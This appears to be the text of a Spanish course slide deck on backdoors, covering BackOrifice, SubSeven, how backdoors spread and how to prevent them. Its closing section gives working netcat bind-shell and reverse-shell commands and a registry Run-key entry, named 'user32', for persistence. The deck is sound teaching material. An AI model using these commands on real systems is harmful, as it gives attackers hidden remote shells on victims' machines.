back doors
TRANSCRIPT
BACKDOORS
AUDITORIA DE SISTEMAS
SOFTWARE MALINTENCIONADO
Software malintencionado o “malware” (malicious software): término para designar un programa informático que provoca de forma intencionada una acción dañina para el sistema y/o usuario.
Software malintencionado o “malware” (malicious software): término para designar un programa informático que provoca de forma intencionada una acción dañina para el sistema y/o usuario.
Tipos de malwareTipos de malware
definición clásica Virus Gusanos Troyanos Bombas lógicas
definición clásica Virus Gusanos Troyanos Bombas lógicas
ampliación Spyware Backdoors Keyloggers Dialers RootKits Exploits …
ampliación Spyware Backdoors Keyloggers Dialers RootKits Exploits …
evoluciónevolución
TIPOS DE MALWARE: BACKDOOR
Backdoor: o puerta trasera, permite acceso y control remoto de un sistema sin una autentificación legítima.Backdoor: o puerta trasera, permite acceso y control remoto de un sistema sin una autentificación legítima.
EjemploEjemplo
Backdoor BackOrifice
módulo cliente (atacante) y módulo servidor (víctima)
servidor .exe por defecto abre puerto TCP/31337
atacante obtiene control total sobre la víctima
lectura/escritura de archivos, ejecutar aplicaciones, reiniciar el sistema, visualizar la pantalla, manejar el ratón y teclado de la víctima, robar contraseñas, etc.
Backdoor BackOrifice
módulo cliente (atacante) y módulo servidor (víctima)
servidor .exe por defecto abre puerto TCP/31337
atacante obtiene control total sobre la víctima
lectura/escritura de archivos, ejecutar aplicaciones, reiniciar el sistema, visualizar la pantalla, manejar el ratón y teclado de la víctima, robar contraseñas, etc.
Los más conocidos son Back Orifice y NetBus, dos de los primeros backdoors, que hasta nuestros días siguen vigentes aunque en menor cantidad.
Otro muy conocido es el SubSeven, que también fue introducido en millones de sistemas en el mundo.
Los más conocidos son Back Orifice y NetBus, dos de los primeros backdoors, que hasta nuestros días siguen vigentes aunque en menor cantidad.
Otro muy conocido es el SubSeven, que también fue introducido en millones de sistemas en el mundo.
LOS MAS CONOCIDOS
W32 afecta a plataformas Windows 32bits
W95 afecta a plataformas Windows 9X/Me
WM virus de macro para Word
XM virus de macro para Excel
Worm gusano
Troj troyano
Bck backdoor
VBS escrito en Visual Basic Script
JS escrito en Java Script
Joke broma
@mm se propaga por e-mail de forma masiva
W32 afecta a plataformas Windows 32bits
W95 afecta a plataformas Windows 9X/Me
WM virus de macro para Word
XM virus de macro para Excel
Worm gusano
Troj troyano
Bck backdoor
VBS escrito en Visual Basic Script
JS escrito en Java Script
Joke broma
@mm se propaga por e-mail de forma masiva
Prefijos y sufijos más comunesPrefijos y sufijos más comunes
NOMENCLATURA EN LA IDENTIFICACIÓN DEL MALWARE
BACKDOORS
Un backdoor es un programa que se introduce en el ordenador de manera encubierta, aparentando ser inofensivo. Una vez es ejecutado, establece una "puerta trasera" a través de la cual es posible controlar el ordenador afectado. Esto permite realizar en el mismo acciones que pueden comprometer la confidencialidad del usuario o dificultar su trabajo.
Las acciones permitidas por los backdoors pueden resultar muy perjudiciales. Entre ellas se encuentran la eliminación de ficheros o la destrucción de la información del disco duro. Además, pueden capturar y reenviar datos confidenciales a una dirección externa o abrir puertos de comunicaciones, permitiendo que un posible intruso controle nuestro ordenador de forma remota.
Algunos ejemplos de backdoors son: Orifice2K.sfx, Bionet.318, Antilam y Subseven.213.
BACKDOORS
CONCEPTOS
• Serie de aplicaciones o de secuencias de código que
permiten el acceso no autorizado de un usuario/intruso a un sistema.
• 65535 puertos TCP/IP destinados a correr servicios
• Su misión es pasar desapercibidos, y estar a la escucha hasta que el atacante lo use.
• Aprovechan bugs en los sistemas o son creadas por el programador para tener acceso al mismo.
BACKDOORS
CONCEPTOS
• Los Backdoors, han empezado a consolidarse como la temible nueva generación del vandalismo cibernético.
• Pueden tomar el control de los sistemas infiltrados: Servidores, Estaciones de Trabajo o PCs.
• Los Backdoors no son esencialmente virus, sino "Herramientas de Control Remoto“ con fines malintencionados.
BACKDOORS
Estructura de los Backdoors
• Tienen dos componentes principales: el programa Servidor, que se instala en el sistema de la víctima y el programa Cliente que actúa en la computadora del atacante.
• Establecen una relación Cliente/Servidor.
• El atacante puede ejecutar remotamente acciones con privilegios de administrador.
Ejecutar aplicaciones
Abrir archivos adjuntos
Ingenieria Social
Configuración débil del sistema operativo
Configuración débil de aplicaciones Internet
Vulnerabilidades del S.O. y aplicaciones
Ejecutar aplicaciones
Abrir archivos adjuntos
Ingenieria Social
Configuración débil del sistema operativo
Configuración débil de aplicaciones Internet
Vulnerabilidades del S.O. y aplicaciones
BACKDOORS
Formas de PropagaciónFormas de Propagación
TroyanosTroyanos
Camuflados dentro de otro programa conocido que nos pueda interesar:
"Última versión de photoshop+crack descárgalo ahora".
En este caso la Backdoor se instalara en segundo plano mientras se instala la aplicación descargada. De esta forma el usuario no se dará por enterado de nada.
Camuflados dentro de otro programa conocido que nos pueda interesar:
"Última versión de photoshop+crack descárgalo ahora".
En este caso la Backdoor se instalara en segundo plano mientras se instala la aplicación descargada. De esta forma el usuario no se dará por enterado de nada.
BACKDOORS
Mensajes de Correo ElectrónicoMensajes de Correo Electrónico
Es la forma más fácil de propagación; por medio de un archivo adjunto a un mensaje.
Si el receptor comete el error de ejecutarlo, instalará el Servidor del Backdoor sin saberlo, permitiendo que el intruso pueda controlar el sistema infectado.
postales, fotos pornográficas,…
Es la forma más fácil de propagación; por medio de un archivo adjunto a un mensaje.
Si el receptor comete el error de ejecutarlo, instalará el Servidor del Backdoor sin saberlo, permitiendo que el intruso pueda controlar el sistema infectado.
postales, fotos pornográficas,…
BACKDOORS
TelnetTelnet
Emulación de terminal para las redes TCP/IP.
Funcionan en modo Cliente/Servidor permitiendo ejecutar comandos en el equipo infectado.
El intruso a través del Telnet puede ejecutar cada instrucción como si la hubiera ingresado directamente en la consola de la maquina local.
Emulación de terminal para las redes TCP/IP.
Funcionan en modo Cliente/Servidor permitiendo ejecutar comandos en el equipo infectado.
El intruso a través del Telnet puede ejecutar cada instrucción como si la hubiera ingresado directamente en la consola de la maquina local.
BACKDOORS
Otras FormasOtras Formas
Redes Compartidas
Otros servicios de Internet (HTTP, FTP, ICQ, Chat, Mensajería Instantánea)
Usuarios de una misma red local o por medio de unidades de almacenamiento extraible.
El sabotaje interno.
Redes Compartidas
Otros servicios de Internet (HTTP, FTP, ICQ, Chat, Mensajería Instantánea)
Usuarios de una misma red local o por medio de unidades de almacenamiento extraible.
El sabotaje interno.
BACKDOORS
•Extraer y enviar información del sistema al intruso. •Robar o alterar passwords.•Anular procesos en ejecución. •Mostrar mensajes en la pantalla.•Manipular el Mouse/Teclado.•Mostrar/ocultar la Barra de Tareas.•Abrir y cerrar la bandeja del CD.•Reiniciar el sistema.•Formatear el disco duro.
•Extraer y enviar información del sistema al intruso. •Robar o alterar passwords.•Anular procesos en ejecución. •Mostrar mensajes en la pantalla.•Manipular el Mouse/Teclado.•Mostrar/ocultar la Barra de Tareas.•Abrir y cerrar la bandeja del CD.•Reiniciar el sistema.•Formatear el disco duro.
CAPACIDADES DE LOS BACKDOORS
RECOMENDACIONES
Visión actual en la prevenciónVisión actual en la prevención
Filtrado y protección de las comunicaciones.
Actualización de software (parches de seguridad).
Monitoreo intensivo y Auditoria.
No usar Claves de Acceso con nombres obvios o asociados al de los usuarios, como fechas de nacimiento, apelativos, etc.
Una estricta política de manejo y control de los usuarios en carpetas compartidas
Filtrado y protección de las comunicaciones.
Actualización de software (parches de seguridad).
Monitoreo intensivo y Auditoria.
No usar Claves de Acceso con nombres obvios o asociados al de los usuarios, como fechas de nacimiento, apelativos, etc.
Una estricta política de manejo y control de los usuarios en carpetas compartidas
RECOMENDACIONES
Factor S.O. y aplicacionesFactor S.O. y aplicaciones
Desactivar los servicios no necesarios.
Aplicar actualizaciones automáticas
Configuración segura navegador y correo
Políticas de uso de portátiles, PDAs, memorias USB.
Segmentación lógica redes
Políticas de privilegios según usuario y aplicaciones
Políticas de seguridad de recursos compartidos
Políticas de backups
Desactivar los servicios no necesarios.
Aplicar actualizaciones automáticas
Configuración segura navegador y correo
Políticas de uso de portátiles, PDAs, memorias USB.
Segmentación lógica redes
Políticas de privilegios según usuario y aplicaciones
Políticas de seguridad de recursos compartidos
Políticas de backups
RECOMENDACIONES
Factor S.O. y aplicacionesFactor S.O. y aplicaciones
Educar / formar al usuario. Cultura de seguridad.
Formatos potencialmente peligrosos
No abrir archivos no solicitados
No utilizar fuentes no confiables
Navegación segura
Política de passwords
Copias de seguridad
Educar / formar al usuario. Cultura de seguridad.
Formatos potencialmente peligrosos
No abrir archivos no solicitados
No utilizar fuentes no confiables
Navegación segura
Política de passwords
Copias de seguridad
RECOMENDACIONES
Factor humanoFactor humano
BACKDOOR CON NETCAT
LISTADO DE COMANDOS
-d modo oculto o demonio (queda ejecutándose sin interactuar con el equipo) -e prog ejecuta programa indicado a continuación del parámetro (usado para shells remotas) -g gateway source-routing hop point, up to 8 -G num source-routing pointer: 4, 8, 12, ... -h Ayuda -i secs tiempo de espera para líneas enviadas o entre puertos escaneados -l escucha de conexiones entrantes (tras sesión TCP/UDP deja de escuchar) -L como -l pero permanece escuchando tras sesión TCP/UDP -n no realiza resoluciones DNS (realizadas por defecto) -o file hex dump of traffic -p port número de puerto -r randomize local and remote ports -s addr local source address -t responde negociaciones TELNET -u modo UDP (por defecto es TCP) -v modo detallado(-v -v es aun más detallado) -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning>
BACKDOOR CON NETCAT: CONEXION DIRECTA
Escenario: Equipo atacante 192.168.1.3 Equipo victima 192.168.1.10
lo primero es dejar un netcat en la victima de la siguiente manera:
nc -d -l -L -e cmd.exe -p 1234
Este comando le dice al nc que abra el puerto 1234 y nos espere con una consola (cmd.exe)
Ahora solo debemos conectarnos a la victima, abrimos el netcat y ejecutamos el comando:
nc -vv 192.168.1.10 1234
BACKDOOR CON NETCAT: CONEXION INVERSA
En este tipo de conexión no somos nosotros los que nos conectamos a la victima, sino es la victima la que se conecta a nosotros.
Lo primero es dejar en nuestro sistema un netcat de la siguiente forma:
nc -vv -l -L -p 8080
ahora nuestro sistema esta preparado para recibir conecciones al puerto 8080, solo queda dejar en el equipo victima un netcat de la siguiente manera:
nc -d -e cmd.exe 192.168.1.3 8080
BACKDOOR CON NETCAT: COMO BACKDOOR
Desde la consola se ejecuta:
Reg add
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v user32 /d C:\windows\system32\nc "parametros“
Parametros:
nc -d -L -l -e cmd.exe -p <puerto> 'que se quede en un puerto a la escucha.
nc -d -e cmd.exe <IP> <puerto> ' que se conecte a una ip.
Preguntas y respuestas
Defina el modo de funcionamiento de los BackdoorDefina el modo de funcionamiento de los Backdoor
Describa los componentes de los Backdoors y su funcion.Describa los componentes de los Backdoors y su funcion.
Describa los modos de propagacion de los BackdoorsDescriba los modos de propagacion de los Backdoors
Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas a los sistemas.Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas a los sistemas.
Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas al factor humano.Describa recomendaciones para evitar la infiltracion de los Backdoors aplicadas al factor humano.